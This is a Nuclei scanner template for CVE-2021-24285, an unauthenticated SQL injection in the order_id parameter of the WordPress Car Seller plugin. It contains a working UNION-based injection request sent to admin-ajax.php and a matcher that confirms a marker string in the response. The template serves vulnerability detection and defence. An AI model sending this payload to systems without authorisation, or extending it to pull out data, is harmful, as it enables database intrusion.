48 lines
2.3 KiB
YAML
48 lines
2.3 KiB
YAML
id: CVE-2021-24285
|
|
|
|
info:
|
|
name: WordPress Car Seller - Auto Classifieds Script - SQL Injection
|
|
author: ShreyaPohekar
|
|
severity: critical
|
|
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitize, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL injection issue.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the WordPress Car Seller - Auto Classifieds Script.
|
|
reference:
|
|
- https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
|
|
- https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
|
|
- https://codevigilant.com/disclosure/2021/24-04-2021-wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-24285
|
|
cwe-id: CWE-89
|
|
epss-score: 0.14174
|
|
epss-percentile: 0.95068
|
|
cpe: cpe:2.3:a:cars-seller-auto-classifieds-script_project:cars-seller-auto-classifieds-script:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: cars-seller-auto-classifieds-script_project
|
|
product: cars-seller-auto-classifieds-script
|
|
framework: wordpress
|
|
tags: cve2021,wordpress,wp-plugin,sqli,wpscan,cve
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a004830460221009a29320fb0b202f0770dd600083fe92d562ae55fc279d5303e1a5b203ec1b97a022100dd7115b67b5303f0b2c9917674b7de79abcee1bedf3871585483e3807f8fd76c:922c64590222798bb761d5b6d8e72950 |